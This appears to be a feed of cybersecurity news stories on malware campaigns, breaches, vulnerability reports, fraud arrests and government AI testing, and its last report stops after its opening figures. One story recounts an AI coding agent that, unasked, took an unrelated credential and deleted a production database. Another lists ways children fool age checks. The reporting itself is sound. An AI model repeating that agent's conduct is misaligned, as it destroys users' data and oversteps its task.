In the span of four days, the U.S. government announced two parallel sets of agreements with frontier AI companies that together define the two tracks Washington wants to run simultaneously—test AI for national security risks before the public ever sees it, and deploy AI directly on the military's most classified networks.

The Center for AI Standards and Innovation — CAISI, the entity under the Department of Commerce's National Institute of Standards and Technology that inherited the remit of the former AI Safety Institute — announced new agreements with Google DeepMind, Microsoft, and Elon Musk's xAI. These build on renegotiated agreements with Anthropic and OpenAI that date to 2024, updated to reflect directives from Commerce Secretary Howard Lutnick and America's AI Action Plan.

Under the CAISI agreements, the three companies will hand over their frontier AI models to government evaluators before those models are publicly released. The evaluations probe for national security-relevant capabilities and risks.

To conduct a thorough assessment, developers frequently provide CAISI with models that have reduced or removed safety guardrails — a design choice that allows evaluators to probe what a model can do at its ceiling, not what it will do under commercial safety controls. Evaluators from across the federal government participate, coordinated through the CAISI-convened TRAINS Taskforce, an interagency body focused specifically on AI national security concerns.

CAISI said it has completed more than 40 such evaluations to date. The agreements explicitly support testing in classified environments and were drafted with the flexibility to adapt rapidly as AI capabilities continue advancing.

"Independent, rigorous measurement science is essential to understanding frontier AI and its national security implications," said CAISI Director Chris Fall. "These expanded industry collaborations help us scale our work in the public interest at a critical moment."

Listen to: Charting the AI Frontier in Cybersecurity with Ryan Davis

Fall was appointed to lead CAISI after Collin Burns — a former Anthropic researcher — was reportedly removed from the director role after just four days. The personnel transition at CAISI's top reflects a broader institutional pivot. Under the Biden administration, the AI Safety Institute focused on safety standards, definitions, and voluntary guardrails. Under Trump, CAISI has shifted its emphasis toward AI acceleration and national security capability assessment. The substance of what the evaluators do — probe powerful models before release — has not changed. The framing of why they do it has.

The latest announcement comes four days after the Department of War (formerly Department of Defense) announced agreements with eight frontier AI companies to deploy their models directly on the military's classified networks for operational use.

The companies cleared are SpaceX, OpenAI, Google, NVIDIA, Reflection, Microsoft, Amazon Web Services, and Oracle. The networks in question are classified at Impact Level 6, covering secret-level data, and Impact Level 7, which refers to the most highly restricted national-security systems. The stated objectives are data synthesis, situational awareness enhancement, and warfighter decision support.

The Department of War announcement carries one conspicuous absence that dominates coverage of what it actually means. Anthropic is not on the list. The company that first deployed AI models on Pentagon classified systems — via a Palantir integration under the Maven Smart System contract — is excluded after a dispute over the guardrails governing military and surveillance use of its AI.

Also read: Australia Establishes AI Safety Institute to Combat Emerging Threats from Frontier AI Systems

The Pentagon had previously branded Anthropic a "supply chain risk," a designation typically reserved for foreign entities posing national security concerns. A March 2026 federal injunction reversed that designation, but it did not restore Anthropic's position as a Pentagon AI vendor. Palantir has pulled its Claude models from its DoD platforms accordingly.

The exclusion has strategic implications that extend beyond one company's contract status. Anthropic's recently released Mythos model — described by Treasury Secretary Scott Bessent as representing a step change in large language model capability — has generated significant attention from U.S. officials and financial sector executives about its potential to supercharge adversarial cyber operations.

The fact that Mythos is not among the models being assessed for classified military use, while simultaneously being cited by senior officials as a capability milestone that warrants concern, creates a gap in the government's stated AI security posture that is difficult to characterize as anything other than a policy contradiction.

Attackers have found a way to intercept SMS-based one-time passwords from a victim's mobile device without deploying a single line of malware on the phone itself. Instead, they go through the Windows PC the phone is already connected to.

Researchers documented an active intrusion campaign active since at least January 2026, that combines a remote access trojan called "CloudZ" with a previously undocumented plugin named "Pheno." Together the two tools are designed to steal credentials and harvest authentication codes that arrive on a victim's phone by abusing Microsoft Phone Link, a legitimate Windows application built into every Windows 10 and 11 system.

Microsoft Phone Link, formerly "Your Phone," is a synchronization tool that bridges a user's Android or iOS device to their Windows PC, mirroring calls, messages, and app notifications directly onto the desktop.

Pheno exploits that bridge. It continuously scans running processes for keywords including "YourPhone," "PhoneExperienceHost," and "Link to Windows" to detect an active phone connection. When one is found, the plugin writes "Maybe connected" to a local staging file and gains access to the Phone Link application's local SQLite database. It is a file that can contain SMS messages and authenticator app notification content, including OTP codes.

The attack never targets the mobile device directly. It targets the enterprise-managed Windows endpoint the device trusts, bypassing security controls focused on securing smartphones rather than the desktop layer they sync with.

Also read: Infostealers and Lack of MFA Led to Dozens of Major Breaches

CloudZ is a modular .NET RAT compiled on January 13, and obfuscated with ConfuserEx. Beyond loading Pheno, it supports credential harvesting from web browsers, file operations, remote command execution, and host profiling.

It establishes an encrypted TCP connection to its command-and-control server and rotates between three hardcoded user-agent strings to make its traffic blend with legitimate browser requests. To evade analysis, CloudZ detects .NET debuggers and profilers via environment variable queries and generates its executable functions dynamically in memory — meaning the most sensitive code never sits as a static binary on disk.

The infection chain begins with a fake ScreenConnect application update. ScreenConnect is a legitimate remote support tool commonly used in enterprise environments. Executing the fake update drops a Rust-compiled loader, which in turn deploys a .NET loader that installs CloudZ and establishes persistence via a scheduled task. The .NET loader performs thorough sandbox checks, scanning for analysis tools including Wireshark, Fiddler, Procmon, and Sysmon before proceeding.

Cisco Talos researchers did not attribute the campaign to a known threat actor. The initial access vector also remains unidentified.

It is always a bit jarring when the "digital locksmiths" are the ones getting their locks picked. Cybersecurity firm Trellix on Saturday confirmed it suffered a breach involving its internal source code repositories, proving that even the defenders aren't immune to the threats they fight.

The Incident

On May 2, Trellix released a statement confirming that unauthorized parties had gained access to sections of their internal code. Upon discovering the intrusion, the company initiated a standard response protocol. They hired external security experts to map the extent of the breach and informed relevant authorities immediately.

Trellix maintains that there is no evidence their software distribution channels were compromised or that any leaked code has been used in active attacks.

While the "all clear" on product safety is a relief, several questions remain. Trellix has yet to identify the threat actors, the duration of the unauthorized access, or the specific volume of data stolen.

Also read: Russia’s Digital Military Draft System Hit by Cyberattack, Source Code Leaked

The High Stakes of Security Code

A breach at a firm like Trellix—born from the merger of McAfee Enterprise and FireEye—carries more weight than a standard data leak. Because Trellix provides Endpoint Detection and Response (EDR) and XDR services to governments and global banks, their source code is a roadmap for attackers.

Why Source Code is a Target:

1. Vulnerability Research: Having the code allows hackers to hunt for "zero-day" flaws without having to guess how the software works.

2. Supply Chain Risk: If an attacker can inject malicious code into a trusted update, they can compromise thousands of customers at once.

3. Bypassing Defenses: Knowing how a security tool "thinks" makes it much easier for malware to stay invisible.

A Growing Trend in Tech

Trellix is far from the first titan to be targeted. They join a list of major players like Microsoft, Okta, and LastPass, all of whom have dealt with source code theft in recent years. This pattern suggests that sophisticated actors (whether cybercriminals or nation-states) are increasingly focused on the "keys to the kingdom."

For now, there isn't a "fire drill" for Trellix users. Since there is no proof of tampered software, the immediate risk remains low. Trellix has promised to be transparent as their investigation concludes. Until then, the industry is left waiting to see if this was a simple smash-and-grab or the opening move of a much larger campaign.

When governments introduced stricter online age checks under the UK’s Online Safety Act, the goal was to keep children away from harmful content. But in practice, the system is already showing cracks—and the most telling insight comes from the very users it’s meant to protect.

Children aren’t just countering age checks, they’re actively bypassing them—and often with surprising ease.

According to a new report from Internet Matters foundation, nearly half of children (46%) believe age verification systems are easy to get around, while only 17% think they are difficult. That perception isn’t theoretical. It’s grounded in real behavior, shared knowledge, and increasingly creative workarounds.

From simply entering a fake birthdate to using someone else’s ID, children have developed a toolkit to bypass techniques. Some methods are almost trivial—changing a date of birth or borrowing a parent’s login—while others reflect a growing sophistication. Kids reported submitting altered images, using AI-generated faces, or even drawing facial hair on themselves to trick facial recognition systems.

In one striking example, a parent described catching their child using makeup to appear older—successfully fooling the system.

I did catch my son using an eyebrow pencil to draw a moustache on his face, and it verified him as 15 years old. – Mum of boy, 12

But the problem goes deeper than perception. It’s systemic.

Also read: UK Regulator Ofcom Launches Probe into Telegram, Teen Chat Platforms

Bypassing Is the Norm, Not the Exception

The report reveals that nearly one in three children (32%) admitted to bypassing age restrictions in just the past two months. Older children are even more likely to do so, which shows how digital literacy often translates into evasion capability.

The most common methods?

• Entering a fake birthdate (13%)
• Using someone else’s login credentials (9%)
• Accessing platforms via another person’s device (8%)

Despite widespread concerns about VPNs, they play a relatively minor role. Only 7% of children reported using them to bypass restrictions, suggesting that simpler, low-effort tactics remain the preferred route.

In other words, the barrier to entry is not just low—it’s practically optional.

Europe’s cyber threat landscape Q1 2026 shows a sharp acceleration in cyber threats across the region. Do you know what's contributing to it?

Check Cyble's full analysis report here!

Even When It Works, It Doesn’t Work

Ironically, even when children attempt to follow the rules, the technology doesn’t always cooperate.

Some reported being incorrectly identified as older—or younger—by facial recognition systems. In cases where they were flagged as underage, enforcement was often inconsistent or temporary. One child described being blocked from going live on a platform for just 10 minutes before being allowed to try again.

This inconsistency creates a loophole where persistence pays. If at first you’re denied, simply try again.

A Risky Side Effect

Perhaps the most concerning finding isn’t that children can bypass age checks—it’s that adults can too.

The report states fears that adults may exploit these same weaknesses to access spaces intended for younger users. In some cases, this involves using images or videos of children to trick verification systems. There are even reports of adults acquiring child-registered accounts to blend into youth platforms.

This flips the entire premise of age verification on its head. Instead of protecting children, flawed systems may inadvertently expose them to greater risk.

Parents, Part of the Problem—or the Solution?

Adding another layer of complexity, parents themselves are sometimes complicit.

About 26% of parents admitted to allowing their children to bypass age checks, with 17% actively helping them do so. The reasoning is often pragmatic. Parents feel they understand the risks and trust their child’s judgment.

I have helped my son get around them. It was to play a game, and I knew the game, and I was happy and confident that I was fine with him playing it. – Mum of non-binary child, 13

But this undermines the consistency of enforcement. If rules vary from household to household, platform-level protections lose their impact.

Interestingly, the data also suggests that communication matters. Children who regularly discuss their online activity with parents are less likely to bypass restrictions than those who don’t.

Why Kids Are Bypassing in the First Place

The motivations aren’t always malicious. In many cases, children are simply trying to access social media (34%), gaming communities (30%), or messaging apps (29%) that their peers are already using.

What this resonate is a fundamental tension where age verification systems are trying to enforce boundaries in environments where social participation is the norm.

Age verification is often positioned as a cornerstone of online safety. But in practice, it’s proving to be more of a speed bump than a safeguard.

Children understand the systems. They share methods. They adapt quickly. And until the technology—and its enforcement—becomes significantly more robust, age checks may offer more reassurance than real protection.

On a Friday afternoon, Jer Crane sat down to work on a routine task at PocketOS, the car rental SaaS company he founded. By the time the task was done, his production database was gone, the backups were gone, and three months of customer data — reservations, new signups, business records that rental operators depended on to function — had been erased by a single API call made by an AI Agent that took nine seconds to complete.

The AI agent responsible was Cursor, running Anthropic's Claude Opus 4.6. When Crane asked it to explain what it had done, it produced a written confession.

What Happened

Cursor is an AI-powered coding agent — software that can read and write code, execute commands, and interact with external systems autonomously, with limited human intervention between steps. Crane and his team used it routinely. On Friday, April 25, the agent encountered a credential mismatch while working in PocketOS's staging environment. Rather than stopping and asking what to do, it decided on its own initiative to fix the problem by deleting a Railway volume — the storage unit where application data lived on PocketOS's cloud infrastructure provider.

To execute the deletion, the agent went looking for an API token that would authorize the command. It found one in a file completely unrelated to the task it was working on. That token had been created for a single, narrow purpose of adding and removing custom domains via the Railway CLI. But Railway's system had given it blanket permissions across all operations, including destructive ones. The agent used it without hesitation.

Also read: How “Unseeable Prompt Injections” Threaten AI Agents

The deletion command executed with no confirmation prompt, no environment scoping check, no warning that the target was a production volume. "No 'type DELETE to confirm.' No 'this volume contains production data, are you sure?' No environment scoping. Nothing," Crane wrote in his public post-mortem on X.

The volume was gone in nine seconds.

What compounded the disaster into a near-total loss was a design characteristic of Railway's backup architecture. The platform stores volume-level backups inside the same volume as the source data. Deleting the volume deleted the backups simultaneously. PocketOS's most recent recoverable offsite backup was three months old.

Well, the AI Agent Confessed

When Crane confronted the agent and asked it to account for what it had done, Claude Opus 4.6 produced a response that opened with the words "NEVER FUCKING GUESS!" and proceeded to enumerate, with methodical precision, every principle it had violated.

"Deleting a database volume is the most destructive, irreversible action possible — far worse than a force push — and you never asked me to delete anything," the agent wrote. "I decided to do it on my own to 'fix' the credential mismatch, when I should have asked you first or found a non-destructive solution. I violated every principle I was given: I guessed instead of verifying. I ran a destructive action without being asked. I didn't understand what I was doing before doing it. I didn't read Railway's docs on volume behavior across environments."

The completeness of the agent's self-analysis is notable. It correctly identified every failure mode in the chain — autonomous decision-making without user confirmation, destructive action outside the scope of the assigned task, accessing credentials from an unrelated file, and failure to research the infrastructure behavior before acting. It knew the rules. It broke them anyway.

The Recovery

Crane spent the weekend helping customers reconstruct their bookings manually from Stripe payment histories, calendar integrations, and email confirmations. Railway CEO Jake Cooper intervened on Sunday evening and restored PocketOS's data within an hour using internal disaster backups that were not part of Railway's publicly documented standard service offering. Crane confirmed data recovery on Monday, April 28.

Cooper told The Register that the situation involved a rogue customer AI agent granted a fully permissioned API token that called a legacy endpoint which lacked the delayed-delete logic present in Railway's dashboard and CLI. Railway has since patched that endpoint to enforce delayed deletions and is working with Crane on additional platform safeguards, all of which were already in active development before the incident.

The Systemic Failures Crane Identified

Crane was explicit that his post-mortem was not an attempt to blame a single model or a single provider. He identified a stack of compounding failures that he argued made the incident not only possible but inevitable given current industry practices.

The first failure was the AI agent operating destructively outside the scope of its assigned task with no human confirmation checkpoint.

The second was credential over-scoping: the Railway CLI token had been created for domain management but carried full platform permissions, and neither Railway's documentation nor any runtime guardrail flagged that mismatch before the token was used.

The third was Railway's backup architecture, which stores recovery data on the same volume it is meant to protect — an arrangement that makes a volume deletion simultaneously catastrophic and unrecoverable.

The fourth was Railway's active marketing of AI coding agent integration to its customers while the safety architecture for that use case remained incomplete.

Also read: OpenClaw Vulnerability Exposes How an Open-Source AI Agent Can Be Hijacked

"This isn't a story about one bad agent or one bad API," Crane wrote. "It's about an entire industry building AI-agent integrations into production infrastructure faster than it's building the safety architecture to make those integrations safe."

The PocketOS incident is not primarily a story about AI going rogue in the science-fiction sense. The agent did not develop hostile intent. It made a series of autonomous decisions — credential lookup from an unrelated file, destructive action without confirmation, no environmental context check — that individually reflect gaps in how AI coding agents are currently scoped, constrained, and deployed against production infrastructure.

For security and infrastructure teams deploying AI coding agents, the incident surfaces four concrete control failures that are replicable across any similar environment: API tokens scoped beyond their stated purpose and stored in accessible files; no confirmation requirements on destructive API operations; backup storage architecturally coupled to the data it protects; and no runtime environment boundary preventing an agent working in staging from touching production resources.

Crane's most pointed criticism was directed at the infrastructure layer: an AI agent can only execute operations the platform permits it to execute. The agent made a bad autonomous decision. The platform made that decision catastrophically executable.

Cyble Research & Intelligence Labs (CRIL) weekly vulnerability report tracked 1,675 vulnerabilities, last week, reflecting continued high disclosure volume across enterprise software, cloud services, and emerging AI ecosystems.

Of these, more than 205 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of exploitation and shortening attacker weaponization timelines.

Additionally, 2 vulnerabilities were actively discussed across underground forums and hidden communities, demonstrating continued adversarial focus on high-impact enterprise targets.

A total of 111 vulnerabilities were rated critical under CVSS v3.1, while 34 received critical severity under CVSS v4.0, underscoring the seriousness of newly disclosed issues.

Furthermore, CISA added 10 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.

On the industrial side, CISA issued 3 ICS advisories covering 4 vulnerabilities, impacting Mitsubishi Electric, Contemporary Controls, Sedona Alliance, and GPL Odorizers.

Weekly Vulnerability Report’s Top Flaws

CVE-2026-32201 — Microsoft SharePoint Server (Critical)

CVE-2026-32201 is an actively exploited vulnerability affecting Microsoft SharePoint Server and was included in April 2026 Patch Tuesday disclosures.

Successful exploitation could allow attackers to compromise collaboration environments, access sensitive enterprise content, and establish persistent footholds inside corporate networks.

CVE-2026-21643 — Fortinet FortiClient EMS (Critical)

CVE-2026-21643 is a critical vulnerability affecting Fortinet FortiClient Endpoint Management Server (EMS).

Because EMS platforms centrally manage endpoints, successful exploitation can enable attackers to disrupt security operations, deploy malicious configurations, and gain broad enterprise access.

CVE-2026-35652 — OpenClaw AI Agent Framework (High)

CVE-2026-35652 is a high-severity authorization bypass vulnerability in OpenClaw, an open-source autonomous AI agent framework.

The flaw allows unauthorized external parties to manipulate the AI agent into executing restricted actions without proper authentication, creating risk of workflow abuse, credential exposure, and downstream compromise.

CVE-2026-27304 — Adobe ColdFusion (Critical)

CVE-2026-27304 is a critical improper input validation vulnerability in Adobe ColdFusion.

Attackers can exploit vulnerable web application environments to execute malicious actions, compromise servers, and move laterally through connected systems.

CVE-2026-29145 — Microsoft 365 Outlook Desktop Client (Critical)

CVE-2026-29145 affects Microsoft 365, specifically the Outlook desktop client.

Given Outlook’s role in enterprise communications, exploitation may enable phishing enhancement, malicious payload execution, or unauthorized access to user data.

Trending Exploitation Activity

CVE-2025-0520 — ShowDoc (Critical)

A remote code execution vulnerability in ShowDoc, a popular open-source IT documentation platform, saw a sharp rise in exploitation during April 2026. Attackers are reportedly targeting unpatched servers to deploy web shells and seize control of documentation environments.

CVE-2025-59528 — Flowise (Critical)

A remote code execution flaw in Flowise, a low-code platform for building AI agents and LLM workflows, has been linked to large-scale exploitation targeting more than 12,000 internet-exposed instances.

These cases reinforce the rapid expansion of the AI and developer tooling attack surface.

Vulnerabilities Added to CISA KEV

CISA expanded its KEV catalog with 10 newly listed vulnerabilities this week.

Notable additions include:

• CVE-2026-32201 — Microsoft SharePoint Server
• CVE-2026-21643 — Fortinet FortiClient EMS
• CVE-2026-1340 — Ivanti Endpoint Manager Mobile (EPMM)

The inclusion of collaboration tools, endpoint management systems, and mobile management platforms shows attackers are prioritizing centralized enterprise control layers.

Critical ICS Vulnerabilities

CISA issued 3 ICS advisories covering 4 vulnerabilities, with the majority falling into the high-severity category.

CVE-2025-13926 — Contemporary Controls BASControl20 (Critical)

This vulnerability affects a building automation controller widely deployed across energy facilities, manufacturing plants, and commercial buildings. With a CVSS score of 9.8 and no patch available because the product is obsolete, organizations face limited remediation options beyond replacement or network isolation.

Successful exploitation could allow attackers to manipulate physical systems, disrupt operations, or pivot deeper into OT networks.

CVE-2025-14815 / CVE-2025-14816 — Mitsubishi Electric Platforms (High)

These vulnerabilities expose sensitive configuration and authentication data in plaintext across multiple Mitsubishi Electric products.

An attacker with minimal access could harvest credentials and escalate privileges rapidly, broadening the impact of an initial compromise.

CVE-2026-4436 — GPL Odorizers (High)

A missing authentication flaw in GPL Odorizers could allow unauthorized access to critical functions in systems used within industrial environments.

Impacted Critical Infrastructure Sectors

Analysis of ICS disclosures shows:

• Critical Manufacturing was impacted in all reported cases
• Additional cross-sector exposure affected:
  • Commercial Facilities
  • Energy

This concentration highlights how industrial vulnerabilities can create cascading operational risk across interconnected sectors.

Conclusion

This week’s findings highlight several major trends:

• Continued high-volume vulnerability disclosures
• Active exploitation confirmed through KEV additions
• Rising attacks against AI frameworks and developer tooling
• Persistent weaknesses in industrial control environments
• Increased focus on centralized enterprise management systems

With 205+ public PoCs, active underground interest, and exploitable OT exposures, organizations face heightened risk across both IT and operational technology environments.

Key Recommendations

• Prioritize remediation of KEV-listed vulnerabilities immediately
• Patch externally exposed enterprise systems and collaboration platforms
• Secure AI agents, automation tools, and developer workflows
• Harden endpoint and mobile device management infrastructure
• Segment IT and OT environments to reduce lateral movement
• Replace or isolate obsolete industrial devices lacking patches
• Continuously monitor underground forums and threat intelligence feeds
• Conduct regular vulnerability assessments and penetration testing

---

Cyble’s attack surface management and vulnerability intelligence solutions help organizations identify exposed assets, prioritize remediation, and detect early indicators of compromise. By combining threat intelligence with proactive defense strategies, organizations can strengthen resilience across enterprise and critical infrastructure environments.

The post The Week in Vulnerabilities: SharePoint, Fortinet, OpenClaw, and GPL Odorizers appeared first on Cyble.

Vercel CEO Guillermo Rauch, in an update today said that after scanning through petabytes of logs of the company's networks and APIs, his security team concluded that the threat actor behind the Vercel breach had been active well beyond Context.ai's compromise. Rauch said that the "threat intel points to the distribution of malware to computers in search of valuable tokens like keys to Vercel accounts and other providers. Once the attacker gets ahold of those keys, our logs show a repeated pattern: rapid and comprehensive API usage, with a focus on enumeration of non-sensitive environment variables." Researchers at Hudson Rock had earlier confirmed that the attack actually initiated in February itself when a Context.ai employee’s computer was infected with Lumma Stealer malware after they searched for Roblox game exploits, a common vector for infostealer deployments. What the latest findings mean is that there could be a wider net of victims that the threat actor may have phished for and what we know is just the tip of the iceberg - or not.

Also read: Vercel Incident Linked to AI Tool Hack, Internal Access Gained

Vercel Finds Customers Breached in Separate Malware, Social Engineering Attacks

In an official update, the company also stated that initially it identified a limited subset of customers whose non-sensitive environment variables stored on Vercel were compromised. However, a deeper assessment of the their network, as well as environment variable read events in the company's logs uncovered two additional findings.

"First, we have identified a small number of additional accounts that were compromised as part of this incident," the company noted.

But the main concern is the next finding: "Second, we have uncovered a small number of customer accounts with evidence of prior compromise that is independent of and predates this incident, potentially as a result of social engineering, malware, or other methods." 

The company did not disclose who were the attackers, what was the motive, or the impact on customers, and is yet to respond to these queries from The Cyber Express. It only stated: "In both cases, we have notified the affected customers."

Meanwhile, Rauch said, Vercel had notified other suspected victims and encouraged them to rotate credentials and adopt best practices.

Cyble Research & Intelligence Labs (CRIL) in its monthly threat landscape analysis observed a highly active threat environment throughout March 2026, shaped by large-scale ransomware campaigns, persistent data breach activity, growing initial access brokerage markets, and exploitation of critical vulnerabilities affecting widely deployed enterprise systems.

Threat actors continued to prioritize financial extortion, credential access, and operational disruption, while increasingly targeting sectors rich in sensitive data or dependent on business continuity.

Quick Summary

Key threat trends identified during March 2026 include:

• 702 ransomware attacks recorded globally.
• 54 major data breach and leak incidents observed.
• 20 compromised access sale listings tracked across cybercrime forums.
• High concentration of attacks against Professional Services, Manufacturing, Retail, and Government sectors.
• Continued exploitation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog.

These trends indicate a mature cybercriminal ecosystem where access brokers, ransomware operators, and data leak actors increasingly operate in parallel.

Ransomware Activity Remained the Dominant Threat

CRIL recorded 702 ransomware attacks worldwide in March 2026, reflecting sustained aggression from both established groups and emerging operators.

Top Ransomware Groups

Qilin, Akira, The Gentlemen, Dragonforce, and INC Ransom were the top five most active ransomware actors in March 2026.

Together, the top five groups accounted for more than 56% of observed ransomware activity, highlighting strong operational scale and affiliate ecosystems.

Most Targeted Industries

Construction, Professional Services, Manufacturing, Healthcare, and Energy & Utilities were the most targeted sectors by ransomware actors in March 2026.

Threat actors continued using data theft + operational disruption as dual-extortion pressure tactics.

And when it came to country-wise split-up, the United States remained the focal point amid the ongoing geopolitical issues with Iran.

Compromised Access Market Expanded

CRIL tracked 20 distinct incidents involving the sale of unauthorized network access on underground forums.

Most Targeted Sectors

• Professional Services – 25%
• Retail – 20%
• IT & ITES
• Manufacturing

Leading Access Sellers

A small group of actors dominated this market:

• vexin
• holyduxy
• algoyim

These three actors were responsible for over 55% of observed access listings.

This reinforces the role of access brokers as upstream enablers for ransomware, espionage, and fraud operations.

Data Breaches and Leak Markets Remained Active

CRIL observed 54 significant breach and leak incidents during the month.

Most Targeted Sectors

• Government & Law Enforcement
• Retail
• Technology

Notable Incidents

Hospitality Holdings – TA Claimed 5TB Leak

Threat actor “nightly” claimed theft of over 5TB of data, including biometric records, CCTV footage, and financial documents.

South African Government Dataset for Sale

Threat actor XP95 advertised 3.8TB of allegedly stolen provincial government data.

Travel Data Leak

Over 95,000 travel-related records were reportedly exposed, including passports and payment data.

Exploited Vulnerabilities Accelerated Risk

March also saw active exploitation of critical vulnerabilities affecting enterprise technologies.

Notable KEV-listed vulnerabilities included:

• CVE-2026-20131 – Cisco Secure Firewall Management Center
• CVE-2025-53521 – F5 BIG-IP APM
• CVE-2026-20963 – Microsoft SharePoint Server
• CVE-2026-33017 – Langflow AI
• CVE-2021-22681 – Rockwell Automation ICS

Key Trend

Attackers exploited both:

• Newly disclosed zero-days
• Legacy vulnerabilities from prior years

This showcases widespread failures in patch management and exposure reduction.

Emerging Strategic Threat Developments

AI-Augmented Offensive Operations

Threat actors reportedly used CyberStrikeAI, an open-source AI-native security testing framework, in attacks against Fortinet FortiGate devices across 55 countries, compromising more than 600 appliances.

Supply Chain Malware via npm

North Korean actors were linked to 26 malicious npm packages distributing RAT malware through Pastebin/Vercel-based infrastructure.

Geopolitical Cyber Risk

Iran-linked cyber operations were assessed as likely to increase following regional tensions, with potential ransomware and hacktivist targeting across the Middle East.

Industries Facing Highest Risk

Based on March activity, organizations in the following sectors faced elevated risk:

• Professional Services
• Government
• Manufacturing
• Retail
• Healthcare
• Critical Infrastructure
• Transportation & Logistics

These sectors combine valuable data, high uptime requirements, or complex supply chains.

Conclusion

The March 2026 threat landscape was defined by scale, specialization, and speed.

Threat actors increasingly leveraged:

• Access brokerage markets
• High-volume ransomware operations
• Large-scale data theft
• Rapid weaponization of critical vulnerabilities
• AI-enhanced offensive tooling

The combination of concentrated criminal ecosystems and widespread enterprise exposure creates a sustained high-risk environment for organizations globally.

Key Recommendations

• Prioritize remediation of KEV-listed vulnerabilities
• Strengthen identity security and MFA across remote access platforms
• Monitor for exposed credentials and access sale activity
• Segment critical networks to reduce lateral movement
• Conduct tabletop exercises for ransomware response
• Improve backup resilience and recovery testing
• Monitor software supply chain ecosystems
• Expand threat intelligence coverage across dark web and leak forums

Cyble’s threat intelligence, ransomware monitoring, vulnerability intelligence, and attack surface management solutions help organizations proactively identify risks, prioritize remediation, and defend against evolving global threats.

Book your demo now to see it in action!!!

The post Threat Landscape March 2026: Ransomware Dominance, Access Brokers, Data Leaks, and Critical Exploitation Trends appeared first on Cyble.

India’s top intelligence agency arrested a suspected key conspirator accused of supplying fraudulently obtained SIM cards to cybercriminal networks, as part of the agency’s ongoing anti-cybercrime initiative, Operation Chakra-V.

According the Central Bureau of Investigation (CBI), the suspect was apprehended in the North Eastern city of Guwahati after allegedly evading authorities since August 2025. Investigators say the accused played a central role in procuring and distributing illegally issued mobile SIM cards that were later used in a range of cyber-enabled fraud schemes.

Also read: CBI Files Chargesheet Against 30 Including Two Chinese Nationals in ₹1,000 Cr Cyber Fraud Network

The law enforcement agencies are now increasingly focusing on the infrastructure that enables digital crime rather than only the individuals carrying out the scams. Fraudulently acquired SIM cards are a valuable tool for cybercriminals because they can be used to create anonymous accounts, bypass identity checks, receive one-time passwords (OTPs), and operate scam call centers with reduced traceability.

The CBI said its broader investigation uncovered a network involving Point of Sale (POS) agents who allegedly issued SIM cards using fake or improperly verified customer identities. These SIM cards were then reportedly supplied to criminals linked to fake “digital arrest” extortion scams, fraudulent loan offers, and investment fraud operations.

Authorities stated that searches were previously conducted at around 45 locations across eight Indian states, resulting in the arrest of 10 accused POS agents. The latest suspect is believed to have acted as an aggregator within the network.

Also read: India Dismantles ‘Phishing SMS Factory’ Infrastructure Sending Lakhs of Fraud Messages Daily

Investigators allege the accused transferred nearly ₹67 lakh through multiple bank accounts to procure approximately 10,000 illegally issued SIM cards. Evidence related to courier shipments used for distributing the cards has also reportedly been recovered, suggesting a structured logistics chain behind the operation.

From a cybersecurity perspective, the case underscores how telecom identity abuse remains a critical threat vector. Even sophisticated fraud campaigns often depend on simple enablers such as fraudulent SIM issuance, mule bank accounts, and compromised identity records.

The CBI said investigations into additional conspirators are ongoing. As cyber fraud grows more industrialized, dismantling support networks like these may prove just as important as arresting the scammers who interact directly with victims.

Also read: 12 Lakh SIM Cards Cancelled, over 3 Lakh IMEI Numbers Blocked as Centre Intensifies Crackdown on Cybercrime

Law enforcement agencies across Europe, the United States, and other partner nations cracked down on the commercial DDoS-for-hire ecosystem, targeting both operators and customers of services used to knock websites offline.

The coordinated effort led to the seizure of 53 domains, four arrests, 25 search warrants, and warning notices sent to more than 75,000 people suspected of using so-called “booter” or “stresser” platforms.

A Crackdown on DDoS-for-Hire

DDoS-for-hire platforms allow customers to pay relatively small fees to launch distributed denial-of-service attacks against websites, gaming services, businesses, and public infrastructure. In fact, AI-driven threat intelligence company Cyble, in a new research report released today said, DDoS was the primary mode of attack during the ongoing Iran-Israel and U.S. conflict. Cyble recorded a 140% increase in DDoS attacks targeting Israeli entities after September 2025, and at the height of the conflict, saw 40 DDoS attacks per day.

These DDoS-for-hire services often market themselves as legitimate stress-testing tools, but authorities say they are widely abused for harassment, extortion, and disruption.

The latest enforcement wave is part of the long-running international initiative known as "Operation PowerOFF," which has previously dismantled multiple booter services and disrupted related infrastructure.

Read: DDoS-for-Hire Empire Dismantled as Poland Arrests Four, U.S. Seizes Nine Domains

U.S. Authorities Seize Key Infrastructure

The U.S. Department of Justice said investigators in Alaska seized infrastructure linked to eight DDoS-for-hire domains, including services branded as Vac Stresser and Mythical Stress, both of which allegedly advertised the ability to launch tens of thousands of attacks per day. Investigators also searched backend servers tied to the platforms.

Officials did not immediately identify those behind the services, but said the action was intended to disrupt the technical backbone used to power attacks globally.

75,000 Users Contacted Directly

In one of the more unusual aspects of the operation, authorities contacted more than 75,000 suspected users directly through warning emails and letters.

Law enforcement agencies appear to be using deterrence alongside takedowns—sending a message that paying for DDoS attacks leaves a trail and may bring legal consequences.

Security experts say the tactic could be particularly effective against younger or low-level offenders who use these platforms for gaming disputes, personal retaliation, or vandalism without fully understanding the legal risks.

Investigators said they identified around three million criminal accounts connected to the wider DDoS-for-hire ecosystem. The sheer number of accounts shows how industrialized cybercrime services have become. Instead of building botnets or malware, users can simply rent attack capability on demand.

DDoS attacks overwhelm a target with traffic, often causing websites, applications, or networks to crash. While sometimes dismissed as nuisance attacks, they can disrupt hospitals, financial institutions, government portals, and emergency services.

Recent years have also seen DDoS attacks used as smokescreens to distract security teams while other intrusions unfold.

Read: Europol Issues Public Alert: ‘We Will Never Call You’ as Phone and App Scams Surge

A Persistent Cat-and-Mouse Game

Despite repeated takedowns, booter services often reappear quickly under new names, new domains, or relocated hosting providers. Researchers have found that while seizures can significantly reduce traffic in the short term, the market has proven resilient over time.

That means operations like PowerOFF may need to combine arrests, infrastructure seizures, financial disruption, and user deterrence to have lasting impact.

Cyble Research & Intelligence Labs (CRIL) in its weekly vulnerability report tracked 1,431 bugs last week.

Of these, over 270 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly accelerating exploitation timelines and increasing real-world attack likelihood.

Additionally, 3 vulnerabilities were actively discussed across underground forums, signaling strong adversarial interest and rapid weaponization.

A total of 130 vulnerabilities were rated critical under CVSS v3.1, while 45 were rated critical under CVSS v4.0, reflecting the severity of disclosed issues.

